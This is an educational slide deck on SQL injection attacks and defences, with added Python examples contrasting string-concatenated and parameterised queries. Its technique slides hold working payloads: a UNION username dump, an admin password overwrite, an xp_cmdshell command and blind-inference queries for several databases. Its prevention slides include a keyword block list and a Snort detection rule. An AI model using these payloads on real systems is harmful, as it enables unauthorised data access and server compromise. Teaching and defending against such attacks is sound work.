SQL INJECTION ATTACKS

Cade Zvavanjanja
CISO
Gainful Information Security

Introduction   Background    Techniques   Prevention   Demo   Conclusions   Questions
OUTLINE
    - Background of SQL Injection
    - Techniques and Examples
    - Preventing SQL Injection
    - Demo
    - Wrap-Up
    - Questions

BACKGROUND OF SQL INJECTION

DATABASES: WHERE ARE THEY NOW?

                    Fat Server    Fat Client    Fat Server & Fat Client
    Mainframes          X
    Desktop Apps                      X
    Web Apps                                              X

WHY IS SQL A STANDARD?

    Relational Database
      - Platform Independence
      - Loose Semantics
      - Runtime Interpretation

FLEXIBILITY = VULNERABILITY
    - Simple Injection
    - Decoding Error Messages
    - Blind Injection
    - Encoding Exploits
    - Stored Procedures
    ---
    - Programmer Error (Faulty Logic)

SQL INJECTION TECHNIQUES

IMPORTANT SYMBOLS
    '        "Hack"           (terminates a string literal, so what follows it is parsed as SQL)
    --       "Comment Out"    (the rest of the line is ignored by the database)
    ;        "End Statement"  (lets a second statement follow the first)
    %, *     "Wildcards"
SQL INJECTION DEFINITION

    The input field is modified in such a way that the database
    returns unintended data.

    SQL:
        SELECT <column name>
        FROM <table name>
        WHERE <logic expression>
EXAMPLE: DATABASE SCHEMA
    Table Users
      - Has columns "username" and "password"
      - Accessed when users log in
    Table Customers
      - Has column "phone"
      - Users can look up other customers' phone numbers by name
    Application does no input validation

RETURNING EXTRA ROWS WITH "UNION"
    Query:
        SELECT phone
        FROM Customers
        WHERE last_name = '<name>'

    Input (as <name>):
        x' UNION SELECT username FROM users WHERE 'x' = 'x

    Resulting query:
        SELECT phone FROM Customers WHERE last_name = 'x'
        UNION SELECT username FROM users WHERE 'x' = 'x'

MODIFYING RECORDS
    Application has a password-changing page.

    SQL:
        UPDATE users
        SET password = '<newpassword>'
        WHERE username = '<username>'

    Input (as <newpassword>):
        newpassword' WHERE username LIKE '%admin%' --

    Resulting query (everything after -- is a comment):
        UPDATE users SET password = 'newpassword' WHERE username LIKE '%admin%' --' WHERE username = '<username>'

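The two slides above (the UNION look-up and the password-change UPDATE) can be run end to end to see exactly what each input does, and what changes when the same inputs are bound through placeholders (the VARIABLE PLACEHOLDERS slide later in the deck). The following is an added example, not code from the deck or its author; it assumes Python's bundled sqlite3 in place of the MySQL/SQL Server used in the talk, and a constructed Users/Customers dataset with made-up accounts.

```python
import sqlite3

# Constructed sample data for the deck's Users / Customers schema; not real accounts.
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE customers (last_name TEXT, phone TEXT);
        INSERT INTO users VALUES ('admin', 'adminpw'), ('bob', 'bobpw');
        INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0101');
    """)
    return con


# The two inputs from the slides, used verbatim.
UNION_INPUT = "x' UNION SELECT username FROM users WHERE 'x' = 'x"
UPDATE_INPUT = "newpassword' WHERE username LIKE '%admin%' --"


def lookup_phone_vulnerable(con, name):
    # String concatenation: the input is parsed as part of the SQL grammar, so the
    # quote inside it ends the literal and the UNION appends a second result set.
    sql = "SELECT phone FROM customers WHERE last_name = '" + name + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_phone_safe(con, name):
    # Placeholder: the value travels separately from the query text and can only
    # ever be compared against last_name, never re-parsed as SQL.
    sql = "SELECT phone FROM customers WHERE last_name = ?"
    return [row[0] for row in con.execute(sql, (name,))]


def change_password_vulnerable(con, username, new_password):
    sql = ("UPDATE users SET password = '" + new_password
           + "' WHERE username = '" + username + "'")
    con.execute(sql)
    con.commit()


def change_password_safe(con, username, new_password):
    con.execute("UPDATE users SET password = ? WHERE username = ?",
                (new_password, username))
    con.commit()


def passwords(con):
    return dict(con.execute("SELECT username, password FROM users"))


def demo():
    """Runs both slide inputs against both query styles and returns the outcomes."""
    con = fresh_db()
    leaked = lookup_phone_vulnerable(con, UNION_INPUT)    # usernames instead of phones
    blocked = lookup_phone_safe(con, UNION_INPUT)         # [] : no customer has that name
    change_password_vulnerable(con, "bob", UPDATE_INPUT)  # admin's password rewritten, bob's untouched
    after_vulnerable = passwords(con)

    con = fresh_db()
    change_password_safe(con, "bob", UPDATE_INPUT)        # bob's password is now that literal string
    after_safe = passwords(con)
    return leaked, blocked, after_vulnerable, after_safe


if __name__ == "__main__":
    for label, value in zip(("leaked", "blocked", "after_vulnerable", "after_safe"), demo()):
        print(label, value)
```

The point worth noticing in the safe variants is that the "attack" strings are still accepted; they simply end up stored or compared as data, which is why parameter binding does not depend on spotting dangerous characters.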
MS SQL SERVER
    Default SQL Server setup
      - Default system admin account "sa" enabled
      - No password!!!
    Supports multiple queries
    "Extended stored procedures": C/C++ DLL files
      - Read/write external files
      - Access command line

EXPLOITING SQL SERVER
    Use the phone look-up query again:
        SELECT phone
        FROM customers
        WHERE last_name = '<name>'

    Input (as <name>):
        '; exec master..xp_cmdshell 'iisreset'; --

DATA-MINING WITH SQL INJECTION
    Three classes of data-mining:
      - In-band
      - Out-of-band
      - Inference

IN-BAND ATTACKS
    Data is included in the response from the web server
    Could be a well-rendered web page
      - Using UNION SELECTs
    Error messages

OUT-OF-BAND ATTACKS
    Data is retrieved using another communication channel:
      - UTL_HTTP.REQUEST
      - OPENROWSET
      - XP_SENDMAIL
INFERENCE ATTACKS
    At the core of inference is a question
    Action is taken based upon the answer

    Chris Anley's time delay (T-SQL):

        declare @s varchar(8000)
        select @s = db_name()
        if (ascii(substring(@s, 1, 1)) & (power(2, 0))) > 0
           waitfor delay '0:0:5'
INFERENCE ATTACKS…CONT:
    Examples:
      - Time delay
      - Generate 200/500 responses
      - Response variation
      - Wildly silly example: send mail to tech support of XYZ Corp about a
        modem problem or a monitor problem; if the call comes back about a
        modem problem we know the answer
INFERENCE ATTACKS…CONT:
    CASE statements in SQL:

        SELECT CASE
          WHEN condition
          THEN do_one_thing
          ELSE do_another END

INFERENCE THROUGH WEB SERVER RESPONSE CODES
    Need a query that will compile fine but generate an error on branch
    execution:

        SELECT CASE WHEN condition THEN 1 ELSE 1/0 END
INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:
    Notes:
      - Works well with SQL Server, Oracle, DB2
      - MySQL returns NULL for 1/0 instead of raising an error
      - Informix ODBC driver returns 200, even in the event of an error
      - Response code could be 302 Redirect, etc.; the principle is the same
      - Leaves a large number of 500 responses in log files
      - App environments like PL/SQL will return 404 instead of 500
INFERENCE THROUGH RESPONSE VARIATIONS:
    Parameter splitting and balancing
    Avoids 500 responses

PARAMETER SPLITTING AND BALANCING
    String parameter 'NGSSOFTWARE' can be rewritten as:
      - 'NGSSOFTWA'+'RE'
      - 'NGSSOFTWA'||'RE'
      - 'NGSSOFTWA'|| (SUBSELECT RETURNS R) || 'E'
      - 'NGSSOFTWA' + (SUBSELECT RETURNS R) + 'E'

    Numeric parameter 2 can be rewritten as:
      - 1 + 1
      - 1 + (SUBSELECT RETURNS 1)
DEALING WITH VARIOUS APPLICATION ENVIRONMENTS
    Cold Fusion Management
      - Converts " to &quot;
      - Converts & to &amp;
      - Converts > to &gt;
      - Converts < to &lt;
      - Doubles up single quotes
          - Usually means the attack vector is numeric input
    PHP often doubles single quotes: magic quotes

DEALING WITH VARIOUS APPLICATION ENVIRONMENTS…CONT:
    Rather than > use BETWEEN X AND Y

    Rather than & use ^
        A xor BIT = C
          - if C is greater than A then the bit is not set
          - if C is less than A then the bit is set

    Rather than 'A' use CHR(65)/CHAR(65)
INFERENCE QUERIES…
    SQL Server: String data

        ' + (select case when
               ascii(substring((sub-query),the_byte,1))^the_bit
               between 0 and ascii(substring((sub-query),the_byte,1))
             then char(known_value) else char(1/0) end) + '

INFERENCE QUERIES…
    Oracle: Numeric

        + (select case when
               bitand(ascii(substr((sub-query),the_byte,1)), the_bit)
               between 1 and 255
             then 0 else 1/0 end
           from dual)

INFERENCE QUERIES…
    Oracle: String data

        '|| (select case when
                bitand(ascii(substr((sub-query),the_byte,1)), the_bit)
                between 1 and 255
              then chr(known_val) else chr(1/0) end
            from dual) ||'

INFERENCE QUERIES…
    MySQL: Numeric

        + (select case when
               (ascii(substring((sub-query),the_byte,1))^the_bit)
               between 0 and ascii(substring((sub-query),the_byte,1))
             then 0 else 1 end

    (uses page response variation)

INFERENCE QUERIES…
    MySQL: String data

        ' + (select case when
                (ascii(substring((sub-query),the_byte,1))^the_bit)
                between 0 and ascii(substring((sub-query),the_byte,1))
              then 0 else 1 end) + '

    (one returns no recordset; the other returns all rows)
INFERENCE QUERIES…
    Informix: Numeric

        + (select distinct case when bitval((SELECT distinct
              DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),
                "{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,
                "-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,
                "0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,
                "A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,
                "L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,
                "W",87,"X",88,"Y",89,"Z",90,
                "a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,
                "k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,
                "u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63)
              from sysmaster:informix.systables),the_bit) between 1 and 255
           then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1

INFERENCE QUERIES…
    Informix: String data

        ' || (select distinct case when bitval((SELECT distinct
              DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),
                "{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,
                "-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"",92,".",46,"?",63,"-",45,
                "0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,
                "A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,
                "L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,
                "W",87,"X",88,"Y",89,"Z",90,
                "a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,
                "k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,
                "u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63)
              from sysmaster:informix.systables),the_bit) between 1 and 255
           then 'xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'
PREVENTING SQL INJECTION

    - Input Validation
    - Input Checking Functions
    - Access Rights
    - User Permissions
    - Variable Placeholders
    - Stored Procedures

INPUT VALIDATION
    Checks
      - Type
      - Size
      - Format
      - Range
    Replace quotation marks

    "All input is wrong and dangerous"

INPUT CHECKING FUNCTIONS
    Built-in character rejection

    Vulnerable: untrusted input concatenated straight into the query

        $sql = "SELECT * FROM Users WHERE ID = '" . $_GET['id'] . "'";

    With the escaping function (the escaped value must still sit inside
    quotes; doubling single quotes protects nothing when the value is
    placed in an unquoted numeric position)

        // mysql_* functions were removed in PHP 7; mysqli or PDO is the modern equivalent
        $sql = "SELECT * FROM Users WHERE ID = '" .
               mysql_real_escape_string($_GET['id']) . "'";
        $result = mysql_query($sql);

ACCESS RIGHTS

    Web User
      vs.
    System Administrator ('sa')

USER PERMISSIONS
    Limit query access rights
      - SELECT
      - UPDATE
      - DROP
    Restricted statement access
      - Global-specific
      - Database-specific
      - Table-specific

VARIABLE PLACEHOLDERS (?)
    Defense from string concatenation
    Enforcing database data types

        PreparedStatement prep =
            conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");
        prep.setString(1, pwd);

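The INPUT CHECKING FUNCTIONS slide and the placeholder slide above make a distinction that is easy to miss: escaping quotes only helps when the value ends up inside a quoted literal, whereas type checks plus a placeholder hold even for the numeric `ID` position in the slide's PHP query. The example below is added here and is not code from the deck; it uses Python's sqlite3 instead of MySQL, a constructed Users table with an integer id, a simplified `escape_quotes` standing in for `mysql_real_escape_string` (it only doubles single quotes), and a constructed quote-free input that reuses the deck's UNION idea.

```python
import re
import sqlite3

# Constructed sample table for the slide's "SELECT * FROM Users WHERE ID = ..." query.
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'adminpw'), (2, 'bob', 'bobpw');
    """)
    return con


def escape_quotes(value):
    # The quote-doubling that magic quotes / mysql_real_escape_string perform for the
    # single-quote character (simplified: backslashes and NUL bytes are not handled).
    return value.replace("'", "''")


def by_id_escaped_unquoted(con, raw_id):
    # Mirrors the slide's second PHP snippet as printed: escaped, but not quoted.
    sql = "SELECT username FROM users WHERE id = " + escape_quotes(raw_id)
    return [r[0] for r in con.execute(sql)]


def by_id_escaped_quoted(con, raw_id):
    # Escaping only helps when the value sits inside a quoted literal.
    sql = "SELECT username FROM users WHERE id = '" + escape_quotes(raw_id) + "'"
    return [r[0] for r in con.execute(sql)]


def validate_id(raw_id):
    # Type / size / format / range checks from the INPUT VALIDATION slide.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be 1-9 digits")
    value = int(raw_id)
    if not 1 <= value <= 1_000_000:
        raise ValueError("id out of range")
    return value


def by_id_placeholder(con, raw_id):
    # Validation fixes the type; the placeholder keeps the value out of the grammar.
    sql = "SELECT username FROM users WHERE id = ?"
    return [r[0] for r in con.execute(sql, (validate_id(raw_id),))]


# Constructed inputs: a normal id, and a payload containing no quote character at all,
# so quote-doubling leaves it untouched.
NORMAL = "2"
NO_QUOTES = "0 UNION SELECT password FROM users"


def demo():
    con = fresh_db()
    results = {
        "unquoted_normal": by_id_escaped_unquoted(con, NORMAL),
        "unquoted_attack": by_id_escaped_unquoted(con, NO_QUOTES),  # passwords come back
        "quoted_attack": by_id_escaped_quoted(con, NO_QUOTES),      # [] : compared as text
        "placeholder_normal": by_id_placeholder(con, NORMAL),
    }
    try:
        by_id_placeholder(con, NO_QUOTES)
        results["placeholder_attack"] = "accepted"
    except ValueError as exc:
        results["placeholder_attack"] = "rejected: " + str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Quoting the escaped value does block this particular input, but only because SQLite happens to compare the whole string as text; the validated-integer-plus-placeholder path rejects it before any SQL is built, which is the behaviour the "Enforcing database data types" bullet is asking for.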
STORED PROCEDURES
    Use error checking variables
    Buffer direct database access

DEMONSTRATION

COUNTERMEASURES
    System Administrators
      - White list / blacklist input validation
      - Least privileges
      - Application firewalls

    Developer
      - Stored procedures
      - Parameterized queries
      - Exception handling
WHITELIST INPUT VALIDATION
    UrlScan v3.0
      - Restricts the types of HTTP requests that IIS will process

        [SQL Injection Headers]
        AppliesTo=.asp,.aspx

        [SQL Injection Headers Strings]
        --
        @ ; also catches @@
        alter
        delete
        drop
        exec
        insert

    SNORT
      - Create a rule to check for SQL attack

        alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
          (msg:"SQL Injection "; flow:to_server,established;
          uricontent:".php | .aspx | .asp";
          pcre:"/(%27)|(')|(--)|(%23)|(#)/i";
          classtype:Web-application-attack; sid:9099; rev:5;)
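The Snort rule above and the earlier note that response-code inference "leaves a large number of 500 responses in log files" describe two complementary detections: a signature on the request and a behavioural count on the responses. The following is an added example, not part of the deck, that applies both to web server access logs; it assumes Apache-style combined log lines and uses a constructed log (no real hosts or users), with the rule's pcre and its `.php/.aspx/.asp` uricontent list carried over as written.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The pattern from the Snort rule on the slide, applied to the request URI.
SQLI_PCRE = re.compile(r"(%27)|(')|(--)|(%23)|(#)", re.IGNORECASE)
# The rule's uricontent list, applied as a suffix check on the path part.
SCRIPT_EXT = (".php", ".aspx", ".asp")

# Constructed Apache-style access log lines; hosts, times and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /lookup.asp?name=Smith HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /lookup.asp?name=O%27Brien HTTP/1.1" 200 498
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /lookup.asp?name=x%27%20UNION%20SELECT%20username%20FROM%20users%20WHERE%20%27x%27%3D%27x HTTP/1.1" 200 1980
10.0.0.9 - - [10/Oct/2023:13:56:05 +0000] "GET /lookup.asp?name=x%27%3B-- HTTP/1.1" 500 301
10.0.0.9 - - [10/Oct/2023:13:56:06 +0000] "GET /lookup.asp?name=x%27%3B%20-- HTTP/1.1" 500 301
10.0.0.9 - - [10/Oct/2023:13:56:07 +0000] "GET /lookup.asp?name=Smith%27-- HTTP/1.1" 500 301
10.0.0.7 - - [10/Oct/2023:13:57:10 +0000] "GET /index.html HTTP/1.1" 200 2048
10.0.0.7 - - [10/Oct/2023:13:57:12 +0000] "GET /lookup.asp?name=Jones HTTP/1.1" 500 301
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_line(line):
    """Returns a dict for one log line, or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def matches_snort_rule(uri):
    # Same two conditions as the rule: a script extension on the path and the pcre on the URI.
    path = uri.split("?", 1)[0]
    if not path.lower().endswith(SCRIPT_EXT):
        return False
    return SQLI_PCRE.search(uri) is not None


def analyse(log_text, burst_threshold=3):
    """Returns (signature_hits, bursts): URIs matching the rule, and clients with
    at least burst_threshold HTTP 500 responses (the inference-probing footprint)."""
    signature_hits = []
    errors_per_client = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if matches_snort_rule(rec["uri"]):
            signature_hits.append((rec["ip"], unquote(rec["uri"])))
        if rec["status"] == 500:
            errors_per_client[rec["ip"]] += 1
    bursts = {ip: n for ip, n in errors_per_client.items() if n >= burst_threshold}
    return signature_hits, bursts


if __name__ == "__main__":
    hits, bursts = analyse(SAMPLE_LOG)
    for ip, uri in hits:
        print("signature", ip, uri)
    print("500-bursts", bursts)
```

Running it shows why both checks are wanted: the bare-quote signature also fires on a legitimate `O'Brien` look-up, while the 500-count singles out the one client that is probing repeatedly, and a client whose probes never error (the UNION request) is caught only by the signature.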
LEAST PRIVILEGES
    Enforce least privileges
      - CREATE / DELETE
      - Does not guarantee security
    Access to a portion of data
      - Create views
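The USER PERMISSIONS slide (limit SELECT/UPDATE/DROP per table) and the bullets above (least privilege, views over a portion of the data) can be shown concretely with a policy hook rather than a full GRANT setup. The example below is added here and is not the deck's code; it assumes sqlite3's authorizer callback standing in for database-level grants, a constructed schema that adds the questions slide's 'Students' table, and a hypothetical web-tier policy that is read-only and sees the base tables only through two views.

```python
import sqlite3

# Constructed schema for the deck's example, plus the 'Students' table from the
# questions slide and two views that each expose a slice of one table.
SCHEMA = """
CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
CREATE TABLE customers (last_name TEXT, phone TEXT);
CREATE TABLE students (name TEXT);
INSERT INTO users VALUES ('admin', 'adminpw'), ('bob', 'bobpw');
INSERT INTO customers VALUES ('Smith', '555-0100'), ('Jones', '555-0101');
INSERT INTO students VALUES ('Robert');
CREATE VIEW customer_phones AS SELECT last_name, phone FROM customers;
CREATE VIEW account_names AS SELECT username FROM users;
"""

# Hypothetical web-tier policy: read-only, and only through the two views.
# A base table may be read only while one of its permitted views is being evaluated.
WEB_VIEWS = {"customer_phones", "account_names"}
VIEW_BASE = {"customer_phones": "customers", "account_names": "users"}


def web_user_authorizer(action, arg1, arg2, db_name, inner_view):
    # For SQLITE_READ, arg1/arg2 are table/column; inner_view names the view
    # being expanded (None when the access comes from top-level SQL).
    if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_FUNCTION):
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_READ:
        if arg1 in WEB_VIEWS:
            return sqlite3.SQLITE_OK
        if inner_view in WEB_VIEWS and VIEW_BASE[inner_view] == arg1:
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY
    # UPDATE, DELETE, INSERT, DROP, PRAGMA, transactions: nothing else is permitted.
    return sqlite3.SQLITE_DENY


def connect_as_web_user():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)               # created as the owner, before the policy applies
    con.set_authorizer(web_user_authorizer)
    return con


def attempt(con, sql, params=()):
    """Returns ("ok", rows) or ("denied", message) for one statement under the policy."""
    try:
        return "ok", con.execute(sql, params).fetchall()
    except sqlite3.DatabaseError as exc:       # SQLite reports "not authorized"
        return "denied", str(exc)


def demo():
    con = connect_as_web_user()
    return {
        "phone_via_view": attempt(con, "SELECT phone FROM customer_phones WHERE last_name = ?", ("Smith",)),
        "names_via_view": attempt(con, "SELECT username FROM account_names"),
        "password_direct": attempt(con, "SELECT password FROM users"),
        "change_password": attempt(con, "UPDATE users SET password = 'x' WHERE username = 'admin'"),
        "drop_students": attempt(con, "DROP TABLE students"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The same statements succeed on a connection without the authorizer, which is the point of the "does not guarantee security" bullet: the policy limits what an injected statement can do once it reaches the database, it does not stop the injection itself, so it belongs alongside placeholders and validation rather than in place of them.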
CONCLUSIONS
    SQL injection continues to evolve with new technologies
    Dangerous effects
      - Access to critical information
      - Updating data not meant to be updated
      - Exploiting the DBMS to directly affect the server and its resources

    Prevention of SQL injection
      - Input validation and query building
      - Permissions and access rights
      - Variable placeholders (prepare) and stored procedures

QUESTIONS
    1) What could prevent the 'Students' table from being dropped?

    2) What is another way to prevent injection?

Thank You

    Tel: +236 733 782 490
         +263 773 796 365
         +263 -4- 733 117

    Eml: info@gis.co.zw
         cade@gis.co.zw

    Web: www.gis.co.zw
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfFIDO Alliance
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch TuesdayIvanti
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdfMuhammad Subhan
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform EngineeringMarcus Vechiato
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGDSC PJATK
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!Memoori
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераMark Opanasiuk
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...FIDO Alliance
 
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...
Human Expert Website Manual WCAG 2.0 2.1 2.2 Audit - Digital Accessibility Au...Skynet Technologies
 
How we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfHow we scaled to 80K users by doing nothing!.pdf
How we scaled to 80K users by doing nothing!.pdfSrushith Repakula
 

Dernier (20)

Top 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development CompaniesTop 10 CodeIgniter Development Companies
Top 10 CodeIgniter Development Companies
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & Ireland
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdfThe Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
“Iamnobody89757” Understanding the Mysterious of Digital Identity.pdf
 
Working together SRE & Platform Engineering
Working together SRE & Platform EngineeringWorking together SRE & Platform Engineering
Working together SRE & Platform Engineering
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Google I/O Extended 2024 Warsaw
Google I/O Extended 2024 WarsawGoogle I/O Extended 2024 Warsaw
Google I/O Extended 2024 Warsaw
 
State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!State of the Smart Building Startup Landscape 2024!
State of the Smart Building Startup Landscape 2024!
 
Intro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджераIntro in Product Management - Коротко про професію продакт менеджера
Intro in Product Management - Коротко про професію продакт менеджера
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
Secure Zero Touch enabled Edge compute with Dell NativeEdge via FDO _ Brad at...
 
